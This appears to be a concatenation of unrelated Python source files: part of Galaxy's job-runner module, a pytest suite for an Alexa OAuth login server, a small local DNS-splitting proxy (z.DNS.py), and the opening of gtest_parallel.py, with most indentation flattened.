log.debug( "(%s) Job deleted by user before it entered the %s queue" % ( job_id, self.runner_name ) )
if self.app.config.cleanup_job in ( "always", "onsuccess" ):
job_wrapper.cleanup()
return False
elif job_state != model.Job.states.QUEUED:
log.info( "(%s) Job is in state %s, skipping execution" % ( job_id, job_state ) )
# cleanup may not be safe in all states
return False
# Prepare the job
try:
job_wrapper.prepare()
job_wrapper.runner_command_line = self.build_command_line(
job_wrapper,
include_metadata=include_metadata,
include_work_dir_outputs=include_work_dir_outputs,
modify_command_for_container=modify_command_for_container
)
except Exception as e:
log.exception("(%s) Failure preparing job" % job_id)
job_wrapper.fail( e.message if hasattr( e, 'message' ) else "Job preparation failed", exception=True )
return False
if not job_wrapper.runner_command_line:
job_wrapper.finish( '', '' )
return False
return True
# Runners must override the job handling methods
def queue_job(self, job_wrapper):
raise NotImplementedError()
def stop_job(self, job):
raise NotImplementedError()
def recover(self, job, job_wrapper):
raise NotImplementedError()
def build_command_line( self, job_wrapper, include_metadata=False, include_work_dir_outputs=True,
modify_command_for_container=True ):
container = self._find_container( job_wrapper )
if not container and job_wrapper.requires_containerization:
raise Exception("Failed to find a container when required, contact Galaxy admin.")
return build_command(
self,
job_wrapper,
include_metadata=include_metadata,
include_work_dir_outputs=include_work_dir_outputs,
modify_command_for_container=modify_command_for_container,
container=container
)
def get_work_dir_outputs( self, job_wrapper, job_working_directory=None, tool_working_directory=None ):
"""
Returns list of pairs (source_file, destination) describing path
to work_dir output file and ultimate destination.
"""
if tool_working_directory is not None and job_working_directory is not None:
raise Exception("get_work_dir_outputs called with both a job and tool working directory, only one may be specified")
if tool_working_directory is None:
if not job_working_directory:
job_working_directory = os.path.abspath( job_wrapper.working_directory )
tool_working_directory = os.path.join(job_working_directory, "working")
# Set up dict of dataset id --> output path; output path can be real or
# false depending on outputs_to_working_directory
output_paths = {}
for dataset_path in job_wrapper.get_output_fnames():
path = dataset_path.real_path
if self.app.config.outputs_to_working_directory:
path = dataset_path.false_path
output_paths[ dataset_path.dataset_id ] = path
output_pairs = []
# Walk job's output associations to find and use from_work_dir attributes.
job = job_wrapper.get_job()
job_tool = job_wrapper.tool
for (joda, dataset) in self._walk_dataset_outputs( job ):
if joda and job_tool:
hda_tool_output = job_tool.find_output_def( joda.name )
if hda_tool_output and hda_tool_output.from_work_dir:
# Copy from working dir to HDA.
# TODO: move instead of copy to save time?
source_file = os.path.join( tool_working_directory, hda_tool_output.from_work_dir )
destination = job_wrapper.get_output_destination( output_paths[ dataset.dataset_id ] )
if in_directory( source_file, tool_working_directory ):
output_pairs.append( ( source_file, destination ) )
else:
# Security violation.
log.exception( "from_work_dir specified a location not in the working directory: %s, %s" % ( source_file, job_wrapper.working_directory ) )
return output_pairs
def _walk_dataset_outputs( self, job ):
for dataset_assoc in job.output_datasets + job.output_library_datasets:
for dataset in dataset_assoc.dataset.dataset.history_associations + dataset_assoc.dataset.dataset.library_associations:
if isinstance( dataset, self.app.model.HistoryDatasetAssociation ):
joda = self.sa_session.query( self.app.model.JobToOutputDatasetAssociation ).filter_by( job=job, dataset=dataset ).first()
yield (joda, dataset)
# TODO: why is this not just something easy like:
# for dataset_assoc in job.output_datasets + job.output_library_datasets:
# yield (dataset_assoc, dataset_assoc.dataset)
# I don't understand the reworking it backwards. -John
def _handle_metadata_externally( self, job_wrapper, resolve_requirements=False ):
"""
Set metadata externally. Used by the Pulsar job runner where this
shouldn't be attached to command line to execute.
"""
# run the metadata setting script here
# this is terminate-able when output dataset/job is deleted
# so that long running set_meta()s can be canceled without having to reboot the server
if job_wrapper.get_state() not in [ model.Job.states.ERROR, model.Job.states.DELETED ] and job_wrapper.output_paths:
lib_adjust = GALAXY_LIB_ADJUST_TEMPLATE % job_wrapper.galaxy_lib_dir
venv = GALAXY_VENV_TEMPLATE % job_wrapper.galaxy_virtual_env
external_metadata_script = job_wrapper.setup_external_metadata( output_fnames=job_wrapper.get_output_fnames(),
set_extension=True,
tmp_dir=job_wrapper.working_directory,
# We don't want to overwrite metadata that was copied over in init_meta(), as per established behavior
kwds={ 'overwrite' : False } )
external_metadata_script = "%s %s %s" % (lib_adjust, venv, external_metadata_script)
if resolve_requirements:
dependency_shell_commands = self.app.datatypes_registry.set_external_metadata_tool.build_dependency_shell_commands(job_directory=job_wrapper.working_directory)
if dependency_shell_commands:
if isinstance( dependency_shell_commands, list ):
dependency_shell_commands = "&&".join( dependency_shell_commands )
external_metadata_script = "%s&&%s" % ( dependency_shell_commands, external_metadata_script )
log.debug( 'executing external set_meta script for job %d: %s' % ( job_wrapper.job_id, external_metadata_script ) )
external_metadata_proc = subprocess.Popen( args=external_metadata_script,
shell=True,
cwd=job_wrapper.working_directory,
env=os.environ,
preexec_fn=os.setpgrp )
job_wrapper.external_output_metadata.set_job_runner_external_pid( external_metadata_proc.pid, self.sa_session )
external_metadata_proc.wait()
log.debug( 'execution of external set_meta for job %d finished' % job_wrapper.job_id )
def get_job_file(self, job_wrapper, **kwds):
job_metrics = job_wrapper.app.job_metrics
job_instrumenter = job_metrics.job_instrumenters[ job_wrapper.job_destination.id ]
env_setup_commands = kwds.get( 'env_setup_commands', [] )
env_setup_commands.append( job_wrapper.get_env_setup_clause() or '' )
destination = job_wrapper.job_destination or {}
envs = destination.get( "env", [] )
envs.extend( job_wrapper.environment_variables )
for env in envs:
env_setup_commands.append( env_to_statement( env ) )
command_line = job_wrapper.runner_command_line
options = dict(
job_instrumenter=job_instrumenter,
galaxy_lib=job_wrapper.galaxy_lib_dir,
galaxy_virtual_env=job_wrapper.galaxy_virtual_env,
env_setup_commands=env_setup_commands,
working_directory=os.path.abspath( job_wrapper.working_directory ),
command=command_line,
shell=job_wrapper.shell,
)
# Additional logging to enable if debugging from_work_dir handling, metadata
# commands, etc... (or just peek at the job script.)
job_id = job_wrapper.job_id
log.debug( '(%s) command is: %s' % ( job_id, command_line ) )
options.update(**kwds)
return job_script(**options)
def write_executable_script( self, path, contents, mode=0o755 ):
write_script( path, contents, self.app.config, mode=mode )
def _find_container(
self,
job_wrapper,
compute_working_directory=None,
compute_tool_directory=None,
compute_job_directory=None,
):
job_directory_type = "galaxy" if compute_working_directory is None else "pulsar"
if not compute_working_directory:
compute_working_directory = job_wrapper.tool_working_directory
if not compute_job_directory:
compute_job_directory = job_wrapper.working_directory
if not compute_tool_directory:
compute_tool_directory = job_wrapper.tool.tool_dir
tool = job_wrapper.tool
from galaxy.tools.deps import containers
tool_info = containers.ToolInfo(tool.containers, tool.requirements)
job_info = containers.JobInfo(
compute_working_directory,
compute_tool_directory,
compute_job_directory,
job_directory_type,
)
destination_info = job_wrapper.job_destination.params
return self.app.container_finder.find_container(
tool_info,
destination_info,
job_info
)
def _handle_runner_state( self, runner_state, job_state ):
try:
for handler in self.runner_state_handlers.get(runner_state, []):
handler(self.app, self, job_state)
if job_state.runner_state_handled:
break
except:
log.exception('Caught exception in runner state handler:')
def mark_as_resubmitted( self, job_state, info=None ):
job_state.job_wrapper.mark_as_resubmitted( info=info )
if not self.app.config.track_jobs_in_database:
job_state.job_wrapper.change_state( model.Job.states.QUEUED )
self.app.job_manager.job_handler.dispatcher.put( job_state.job_wrapper )
class JobState( object ):
"""
Encapsulate state of jobs.
"""
runner_states = Bunch(
WALLTIME_REACHED='walltime_reached',
MEMORY_LIMIT_REACHED='memory_limit_reached',
GLOBAL_WALLTIME_REACHED='global_walltime_reached',
OUTPUT_SIZE_LIMIT='output_size_limit'
)
def __init__( self ):
self.runner_state_handled = False
def set_defaults( self, files_dir ):
if self.job_wrapper is not None:
id_tag = self.job_wrapper.get_id_tag()
if files_dir is not None:
self.job_file = JobState.default_job_file( files_dir, id_tag )
self.output_file = os.path.join( files_dir, 'galaxy_%s.o' % id_tag )
self.error_file = os.path.join( files_dir, 'galaxy_%s.e' % id_tag )
self.exit_code_file = os.path.join( files_dir, 'galaxy_%s.ec' % id_tag )
job_name = 'g%s' % id_tag
if self.job_wrapper.tool.old_id:
job_name += '_%s' % self.job_wrapper.tool.old_id
if self.job_wrapper.user:
job_name += '_%s' % self.job_wrapper.user
self.job_name = ''.join( map( lambda x: x if x in ( string.letters + string.digits + '_' ) else '_', job_name ) )
@staticmethod
def default_job_file( files_dir, id_tag ):
return os.path.join( files_dir, 'galaxy_%s.sh' % id_tag )
@staticmethod
def default_exit_code_file( files_dir, id_tag ):
return os.path.join( files_dir, 'galaxy_%s.ec' % id_tag )
class AsynchronousJobState( JobState ):
"""
Encapsulate the state of an asynchronous job, this should be subclassed as
needed for various job runners to capture additional information needed
to communicate with distributed resource manager.
"""
def __init__( self, files_dir=None, job_wrapper=None, job_id=None, job_file=None, output_file=None, error_file=None, exit_code_file=None, job_name=None, job_destination=None ):
super( AsynchronousJobState, self ).__init__()
self.old_state = None
self._running = False
self.check_count = 0
self.start_time = None
self.job_wrapper = job_wrapper
# job_id is the DRM's job id, not the Galaxy job id
self.job_id = job_id
self.job_destination = job_destination
self.job_file = job_file
self.output_file = output_file
self.error_file = error_file
self.exit_code_file = exit_code_file
self.job_name = job_name
self.set_defaults( files_dir )
self.cleanup_file_attributes = [ 'job_file', 'output_file', 'error_file', 'exit_code_file' ]
@property
def running( self ):
return self._running
@running.setter
def running( self, is_running ):
self._running = is_running
# This will be invalid for job recovery
if self.start_time is None:
self.start_time = datetime.datetime.now()
def check_limits( self, runtime=None ):
limit_state = None
if self.job_wrapper.has_limits():
self.check_count += 1
if self.running and (self.check_count % 20 == 0):
if runtime is None:
runtime = datetime.datetime.now() - (self.start_time or datetime.datetime.now())
self.check_count = 0
limit_state = self.job_wrapper.check_limits( runtime=runtime )
if limit_state is not None:
# Set up the job for failure, but the runner will do the actual work
self.runner_state, self.fail_message = limit_state
self.stop_job = True
return True
return False
def cleanup( self ):
for file in [ getattr( self, a ) for a in self.cleanup_file_attributes if hasattr( self, a ) ]:
try:
os.unlink( file )
except Exception as e:
log.debug( "(%s/%s) Unable to cleanup %s: %s" % ( self.job_wrapper.get_id_tag(), self.job_id, file, str( e ) ) )
def register_cleanup_file_attribute( self, attribute ):
if attribute not in self.cleanup_file_attributes:
self.cleanup_file_attributes.append( attribute )
class AsynchronousJobRunner( BaseJobRunner ):
"""Parent class for any job runner that runs jobs asynchronously (e.g. via
a distributed resource manager). Provides general methods for having a
thread to monitor the state of asynchronous jobs and submitting those jobs
to the correct methods (queue, finish, cleanup) at appropriate times.
"""
def __init__( self, app, nworkers, **kwargs ):
super( AsynchronousJobRunner, self ).__init__( app, nworkers, **kwargs )
# 'watched' and 'queue' are both used to keep track of jobs to watch.
# 'queue' is used to add new watched jobs, and can be called from
# any thread (usually by the 'queue_job' method). 'watched' must only
# be modified by the monitor thread, which will move items from 'queue'
# to 'watched' and then manage the watched jobs.
self.watched = []
self.monitor_queue = Queue()
def _init_monitor_thread(self):
self.monitor_thread = threading.Thread( name="%s.monitor_thread" % self.runner_name, target=self.monitor )
self.monitor_thread.setDaemon( True )
self.monitor_thread.start()
def handle_stop(self):
# DRMAA and SGE runners should override this and disconnect.
pass
def monitor( self ):
"""
Watches jobs currently in the monitor queue and deals with state
changes (queued to running) and job completion.
"""
while True:
# Take any new watched jobs and put them on the monitor list
try:
while True:
async_job_state = self.monitor_queue.get_nowait()
if async_job_state is STOP_SIGNAL:
# TODO: This is where any cleanup would occur
self.handle_stop()
return
self.watched.append( async_job_state )
except Empty:
pass
# Iterate over the list of watched jobs and check state
try:
self.check_watched_items()
except Exception:
log.exception('Unhandled exception checking active jobs')
# Sleep a bit before the next state check
time.sleep( 1 )
def monitor_job(self, job_state):
self.monitor_queue.put( job_state )
def shutdown( self ):
"""Attempts to gracefully shut down the monitor thread"""
log.info( "%s: Sending stop signal to monitor thread" % self.runner_name )
self.monitor_queue.put( STOP_SIGNAL )
# Call the parent's shutdown method to stop workers
super( AsynchronousJobRunner, self ).shutdown()
def check_watched_items(self):
"""
This method is responsible for iterating over self.watched and handling
state changes and updating self.watched with a new list of watched job
states. Subclasses can opt to override this directly (as older job runners will
initially) or just override check_watched_item and allow the list processing to
reuse the logic here.
"""
new_watched = []
for async_job_state in self.watched:
new_async_job_state = self.check_watched_item(async_job_state)
if new_async_job_state:
new_watched.append(new_async_job_state)
self.watched = new_watched
# Subclasses should implement this unless they override check_watched_items all together.
def check_watched_item(self, job_state):
raise NotImplementedError()
def finish_job( self, job_state ):
"""
Get the output/error for a finished job, pass to `job_wrapper.finish`
and cleanup all the job's temporary files.
"""
galaxy_id_tag = job_state.job_wrapper.get_id_tag()
external_job_id = job_state.job_id
# To ensure that files below are readable, ownership must be reclaimed first
job_state.job_wrapper.reclaim_ownership()
# wait for the files to appear
which_try = 0
while which_try < (self.app.config.retry_job_output_collection + 1):
try:
stdout = shrink_stream_by_size( open( job_state.output_file, "r" ), DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
stderr = shrink_stream_by_size( open( job_state.error_file, "r" ), DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
which_try = (self.app.config.retry_job_output_collection + 1)
except Exception as e:
if which_try == self.app.config.retry_job_output_collection:
stdout = ''
stderr = 'Job output not returned from cluster'
log.error( '(%s/%s) %s: %s' % ( galaxy_id_tag, external_job_id, stderr, str( e ) ) )
else:
time.sleep(1)
which_try += 1
try:
# This should be an 8-bit exit code, but read ahead anyway:
exit_code_str = open( job_state.exit_code_file, "r" ).read(32)
except:
# By default, the exit code is 0, which typically indicates success.
exit_code_str = "0"
try:
# Decode the exit code. If it's bogus, then just use 0.
exit_code = int(exit_code_str)
except:
log.warning( "(%s/%s) Exit code '%s' invalid. Using 0." % ( galaxy_id_tag, external_job_id, exit_code_str ) )
exit_code = 0
# clean up the job files
cleanup_job = job_state.job_wrapper.cleanup_job
if cleanup_job == "always" or ( not stderr and cleanup_job == "onsuccess" ):
job_state.cleanup()
try:
job_state.job_wrapper.finish( stdout, stderr, exit_code )
except:
log.exception( "(%s/%s) Job wrapper finish method failed" % ( galaxy_id_tag, external_job_id ) )
job_state.job_wrapper.fail( "Unable to finish job", exception=True )
def fail_job( self, job_state ):
if getattr( job_state, 'stop_job', True ):
self.stop_job( self.sa_session.query( self.app.model.Job ).get( job_state.job_wrapper.job_id ) )
self._handle_runner_state( 'failure', job_state )
# Not convinced this is the best way to indicate this state, but
# something is necessary here
if not job_state.runner_state_handled:
job_state.job_wrapper.fail( getattr( job_state, 'fail_message', 'Job failed' ) )
if job_state.job_wrapper.cleanup_job == "always":
job_state.cleanup()
def mark_as_finished(self, job_state):
self.work_queue.put( ( self.finish_job, job_state ) )
def mark_as_failed(self, job_state):
self.work_queue.put( ( self.fail_job, job_state ) )
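# ---------------------------------------------------------------------------
# Illustrative sketch (not part of Galaxy): the monitor-queue pattern that
# AsynchronousJobRunner implements above, reduced to a self-contained example.
# Producers put newly submitted jobs on a queue; a single monitor thread drains
# the queue into a "watched" list and polls each entry until it finishes.
# DemoJob, _run_monitor_demo, the 0.2 s poll interval and the print calls are
# assumptions made for this sketch only; the real runner dispatches to
# check_watched_item(), finish_job() and fail_job() instead.
def _run_monitor_demo():
    import threading
    import time
    try:
        from queue import Queue, Empty      # Python 3
    except ImportError:
        from Queue import Queue, Empty      # Python 2

    class DemoJob(object):
        def __init__(self, name, polls_needed):
            self.name = name
            self.polls_needed = polls_needed

        def poll(self):
            # Pretend to query a resource manager; done once the counter hits 0.
            self.polls_needed -= 1
            return self.polls_needed <= 0

    stop_signal = object()
    monitor_queue = Queue()

    def monitor():
        watched = []
        while True:
            # Move any newly queued jobs onto the watched list.
            try:
                while True:
                    job = monitor_queue.get_nowait()
                    if job is stop_signal:
                        return
                    watched.append(job)
            except Empty:
                pass
            # Poll every watched job and keep only the unfinished ones.
            still_watched = []
            for job in watched:
                if job.poll():
                    print('%s finished' % job.name)
                else:
                    still_watched.append(job)
            watched = still_watched
            time.sleep(0.2)

    monitor_thread = threading.Thread(target=monitor)
    monitor_thread.daemon = True
    monitor_thread.start()
    monitor_queue.put(DemoJob('demo-job-1', polls_needed=2))
    monitor_queue.put(DemoJob('demo-job-2', polls_needed=4))
    time.sleep(1.5)
    monitor_queue.put(stop_signal)
    monitor_thread.join()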
|
test_handlers.py
|
import re
import threading
import urllib
import pytest
import requests
from avs_client.refreshtoken import handlers, helpers, http_server
@pytest.fixture(scope='session')
def server():
return http_server.AmazonLoginHttpServer(
server_address=('localhost', 9000),
RequestHandlerClass=handlers.AmazonAlexaServiceLoginHandler,
client_id='client-id-here',
client_secret='client-secret-here',
device_type_id='device-type-id-here',
callback_url='http://localhost:9000/callback/',
)
@pytest.fixture(scope='session')
def background_server(server):
def thread_function():
server.serve_forever()
thread = threading.Thread(target=thread_function)
thread.start()
try:
yield
finally:
server.shutdown()
thread.join()
@pytest.fixture
def amazon_request_200(requests_mocker):
return requests_mocker.post(
url=helpers.AmazonOauth2RequestManager.authorization_grant_url,
status_code=200,
json={
'refresh_token': 'my-refresh-token'
}
)
@pytest.fixture
def amazon_request_401(requests_mocker):
return requests_mocker.post(
url=helpers.AmazonOauth2RequestManager.authorization_grant_url,
status_code=401,
text='oops!'
)
@pytest.fixture(autouse=True)
def allow_local_server_request(requests_mocker):
requests_mocker.register_uri(
'GET', re.compile('http://localhost:9000/'), real_http=True
)
def test_routes_to_login(background_server):
response = requests.get('http://localhost:9000/', allow_redirects=False)
url = urllib.parse.unquote_plus(response.headers['Location'])
assert url == (
'https://www.amazon.com/ap/oa?client_id=client-id-here&'
'scope=alexa:all&''scope_data={"alexa:all": {"productID": '
'"device-type-id-here", "productInstanceAttributes": '
'{"deviceSerialNumber": "001"}}}&response_type=code&'
'redirect_uri=http://localhost:9000/callback/'
)
def test_routes_to_404(background_server):
response = requests.get('http://localhost:9000/a', allow_redirects=False)
assert response.status_code == 404
def test_handle_callback_amazon_request(
background_server, amazon_request_200, requests_mocker
):
requests.get('http://localhost:9000/callback/?code=my-code')
amazon_request = requests_mocker.request_history[1]
assert amazon_request.json() == {
'client_id': 'client-id-here',
'client_secret': 'client-secret-here',
'code': 'my-code',
'grant_type': 'authorization_code',
'redirect_uri': 'http://localhost:9000/callback/',
}
def test_handle_callback_200_response(background_server, amazon_request_200):
response = requests.get('http://localhost:9000/callback/?code=my-code')
assert response.status_code == 200
assert response.content == b'refresh_token: my-refresh-token'
def test_handle_callback_non_200(background_server, amazon_request_401):
response = requests.get('http://localhost:9000/callback/?code=my-code')
assert response.status_code == 401
assert response.content == b'oops!'
|
z.DNS.py
|
from SocketServer import BaseRequestHandler, ThreadingUDPServer , StreamRequestHandler , ThreadingTCPServer
from cStringIO import StringIO
from fnmatch import fnmatch
import os
import socket
import struct
import time , thread , threading
import re
import sys
DNS_TYPE_A = 1
DNS_CLASS_IN = 1
DNS_CONFIG_FILE = 'dns.conf'
DNS_HOSTS_FILE = 'dns.hosts'
DNS_SWITCH_FILE = 'dns.switch'
DNS_LOCAL_PATH = '.\\'
reg_IP = '((2[0-4]\d|25[0-5]|[01]?\d\d?)\.){3}(2[0-4]\d|25[0-5]|[01]?\d\d?)'
ALL_LOG_LOCK = thread.allocate_lock()
SWI_LOG_LOCK = thread.allocate_lock()
dnsserver = [None,None]
def check_file():
old_info = ( os.stat("dns.conf").st_mtime ,os.stat("dns.hosts").st_mtime ,os.stat("dns.switch").st_mtime )
while dnsserver[0].isRun() :
time.sleep(60)
tmp_info = ( os.stat("dns.conf").st_mtime ,os.stat("dns.hosts").st_mtime ,os.stat("dns.switch").st_mtime )
if old_info != tmp_info :
dnsserver[0].reLoad()
old_info = tmp_info
if (not dnsserver[0].isRun()):
dnsserver[1].killServer()
class dns_server(threading.Thread):
dnsserver = None
over = False
def __init__(self):
threading.Thread.__init__(self)
def run(self):
while not self.over:
self.dnsserver = DNSProxyServer()
self.dnsserver.serve_forever()
def reLoad(self):
if not self.over:
self.dnsserver.shutdown()
self.dnsserver.server_close()
os.system("ipconfig /flushdns")
def killServer(self):
if not self.over:
self.over = True
self.dnsserver.shutdown()
self.dnsserver.server_close()
def isRun(self):
return not self.over
class dns_server_ByTCP(threading.Thread):
dnsserver = None
over = False
def __init__(self):
threading.Thread.__init__(self)
def run(self):
while not self.over:
self.dnsserver = DNSProxyServer_ByTCP()
self.dnsserver.serve_forever()
def killServer(self):
if not self.over:
self.over = True
self.dnsserver.shutdown()
self.dnsserver.server_close()
def main():
dnsserver[0] = dns_server()
dnsserver[0].start()
dnsserver[1] = dns_server_ByTCP()
dnsserver[1].start()
checkfile = threading.Thread(target = check_file , args =())
checkfile.start()
class Struct(object):
def __init__(self, **kwargs):
for name, value in kwargs.items():
setattr(self, name, value)
def parse_dns_message(data):
message = StringIO(data)
message.seek(4)
c_qd, c_an, c_ns, c_ar = struct.unpack('!4H', message.read(8))
question = parse_dns_question(message)
for i in range(1, c_qd):
parse_dns_question(message)
records = []
for i in range(c_an+c_ns+c_ar):
records.append(parse_dns_record(message))
return Struct(question=question, records=records)
def parse_dns_question(message):
qname = parse_domain_name(message)
qtype, qclass = struct.unpack('!HH', message.read(4))
end_offset = message.tell()
return Struct(name=qname, type_=qtype, class_=qclass, end_offset=end_offset)
def parse_dns_record(message):
parse_domain_name(message)
message.seek(4, os.SEEK_CUR)
ttl_offset = message.tell()
ttl = struct.unpack('!I', message.read(4))[0]
rd_len = struct.unpack('!H', message.read(2))[0]
message.seek(rd_len, os.SEEK_CUR)
return Struct(ttl_offset=ttl_offset, ttl=ttl)
def _parse_domain_labels(message):
labels = []
len = ord(message.read(1))
while len > 0:
if len >= 64:
len = len & 0x3f
offset = (len << 8) + ord(message.read(1))
mesg = StringIO(message.getvalue())
mesg.seek(offset)
labels.extend(_parse_domain_labels(mesg))
return labels
else:
labels.append(message.read(len))
len = ord(message.read(1))
return labels
def parse_domain_name(message):
return '.'.join(_parse_domain_labels(message))
def addr_p2n(addr):
return socket.inet_aton(addr)
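# buildrspdata() below hand-assembles a minimal DNS answer for the query held
# in reqdata (the field meanings are standard DNS wire format):
#   reqdata[:2]                -- transaction ID copied from the request
#   '\x81\x80'                 -- flags: standard response, recursion desired/available
#   '\x00\x01\x00\x01\x00\x00\x00\x00' -- QDCOUNT=1, ANCOUNT=1, NSCOUNT=0, ARCOUNT=0
#   reqdata[12:end_offset]     -- the original question section
#   '\xc0\x0c'                 -- compression pointer to the name at offset 12
#   '\x00\x01'                 -- TYPE A
#   '\x00\x01\x00\x00\x07\xd0' -- CLASS IN, TTL = 2000 seconds
#   2-byte RDLENGTH followed by the packed IPv4 address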
def buildrspdata(reqdata,end_offset,packed_ip):
rspdata = reqdata[:2] + '\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00'
rspdata += reqdata[12:end_offset]
rspdata += '\xc0\x0c'
rspdata += '\x00\x01'
rspdata += '\x00\x01\x00\x00\x07\xd0'
rspdata += '\x00' + chr(len(packed_ip))
rspdata += packed_ip
return rspdata
class DNSProxyHandler_ByTCP(StreamRequestHandler):
def handle(self):
data = self.connection.recv(1024)
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("8.8.8.8",53))
s.send(data)
r_data = s.recv(1024)
self.wfile.write(r_data)
s.close()
class DNSProxyHandler(BaseRequestHandler):
def handle(self):
reqdata, sock = self.request
req = parse_dns_message(reqdata)
q = req.question
if self.server.Log_all :
tmp = ''+q.name.ljust(30) + ' ' +time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))+ ' Type:' + str(q.type_)+'\n'
ptmp = DNS_LOCAL_PATH+'All_query.log'
ALL_LOG_LOCK.acquire()
log = open(ptmp ,'a')
log.write(tmp)
log.close()
ALL_LOG_LOCK.release()
if (q.type_ == DNS_TYPE_A) and (q.class_ == DNS_CLASS_IN):
for ip,name in self.server.hostslist:
if fnmatch(q.name.upper(), name.upper()):
if ip == 'skip':
break
rspdata = buildrspdata(reqdata,q.end_offset,ip)
sock.sendto(rspdata, self.client_address)
return
for name,CorF in self.server.switchlist:
if fnmatch(q.name.upper(), name.upper()):
rspdata = self._get_response(reqdata , CorF)
if rspdata:
sock.sendto(rspdata, self.client_address)
return
_tmp = q.name+'\n'
_ptmp = DNS_LOCAL_PATH+'switch.log'
SWI_LOG_LOCK.acquire()
log = open(_ptmp,'a')
log.write(_tmp)
log.close()
SWI_LOG_LOCK.release()
rspdata = self._get_response(reqdata , True)
if rspdata:
sock.sendto(rspdata, self.client_address)
return
else:
rspdata = self._get_response(reqdata , True)
if rspdata:
sock.sendto(rspdata, self.client_address)
return
def _get_response(self, data ,CorF):
con = 0
rspdata = None
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect((self.server.servers[(not CorF) and 1 or 0], 53))
while not rspdata and con <4:
try:
con += 1
sock.sendall(data)
sock.settimeout(3)
rspdata = sock.recv(65535)
except:
rspdata = None
sock.close()
return rspdata
def loadconf():
DNS_SERVER = [None,None]
log_all = [False]
def readline(line):
if (not line.startswith('#')) and len(line) > 2:
parts = line.strip().split()[:2]
if parts[0] == 'Note_Down_All':
if parts[1] == '1':
log_all[0] = True
return
if re.search(reg_IP, parts[1]):
if parts[0] == 'Foreign_DNS':
DNS_SERVER[0]=parts[1]
return
if parts[0] == 'Celestial_DNS':
DNS_SERVER[1]=parts[1]
return
print 'Warning:', DNS_CONFIG_FILE, 'has a malformed line:', line
with open(DNS_LOCAL_PATH+DNS_CONFIG_FILE) as conf:
for line in conf:
readline(line)
if DNS_SERVER[0] and DNS_SERVER[1]:
return tuple(DNS_SERVER),log_all[0]
else:
return None,None
def lodehosts():
hostsline = []
def readline(line):
if (not line.startswith('#')) and len(line) > 2:
parts = line.strip().split()[:2]
if parts[0] == 'skip':
return 'skip',parts[1]
if re.search(reg_IP, parts[0]):
try:
return addr_p2n(parts[0]),parts[1]
except:
return None
return None
return None
with open(DNS_LOCAL_PATH+DNS_HOSTS_FILE) as hosts:
for line in hosts:
htmp = readline(line)
if htmp:
hostsline.append(htmp)
return tuple(hostsline)
def loadswitchfile():
CorF = [False]
switchlist = []
def readline(line):
if (not line.startswith('#')) and len(line) > 2:
if line.startswith('[Celestial Urls]'):
CorF[0] = False
return
if line.startswith('[Foreign Urls]'):
CorF[0] = True
return
if len(line.strip().split()) == 1:
switchlist.append(("".join(line.strip()),CorF[0]))
else:
print 'Warning: malformed line', line, 'in file', DNS_SWITCH_FILE
with open(DNS_LOCAL_PATH+DNS_SWITCH_FILE) as switch:
for line in switch:
readline(line)
return tuple(switchlist)
class DNSProxyServer(ThreadingUDPServer):
def __init__(self):
log = open(DNS_LOCAL_PATH+'switch.log','w')
log.write('This file is cleared on restart!\nUnswitched DNS queries:\n')
log.close()
self.hostslist = lodehosts()
self.switchlist = loadswitchfile()
self.servers,self.Log_all = loadconf()
if not self.servers:
print 'Loading', DNS_CONFIG_FILE, 'failed'
sys.exit(0)
print 'z.DNS is running now!\nUsing DNS: ' + self.servers[0] + ' ' + self.servers[1]
ThreadingUDPServer.__init__(self, ('127.0.0.1', 53), DNSProxyHandler)
class DNSProxyServer_ByTCP(ThreadingTCPServer):
def __init__(self):
ThreadingTCPServer.__init__(self, ('127.0.0.1', 53), DNSProxyHandler_ByTCP)
if __name__ == '__main__':
main()
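# Example configuration (illustrative only -- the format is inferred from
# loadconf(), lodehosts() and loadswitchfile() above, and the IPs/patterns
# below are made up):
#
#   dns.conf
#       Foreign_DNS    8.8.8.8
#       Celestial_DNS  114.114.114.114
#       Note_Down_All  1              # 1 = log every query to All_query.log
#
#   dns.hosts        # "<ip> <pattern>" answers locally; "skip <pattern>" falls through
#       127.0.0.1    ads.example.com
#       skip         *.example.org
#
#   dns.switch       # patterns under a section are resolved by that upstream DNS
#       [Foreign Urls]
#       *.google.com
#       [Celestial Urls]
#       *.baidu.com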
|
gtest_parallel.py
|
# Copyright 2013 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
from functools import total_ordering
import gzip
import io
import json
import multiprocessing
import optparse
import os
import re
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import time
if sys.version_info.major >= 3:
long = int
import _pickle as cPickle
import _thread as thread
else:
import cPickle
import thread
from pickle import HIGHEST_PROTOCOL as PICKLE_HIGHEST_PROTOCOL
if sys.platform == 'win32':
import msvcrt
else:
import fcntl
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate() and raise ProcessWasInterrupted.
class SigintHandler(object):
class ProcessWasInterrupted(Exception): pass
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
signal.signal(signal.SIGINT, lambda signal_num, frame: self.interrupt())
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self):
with self.__lock:
self.__on_sigint()
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p):
with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
code = p.wait()
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
if self.__got_sigint:
raise self.ProcessWasInterrupted
return code
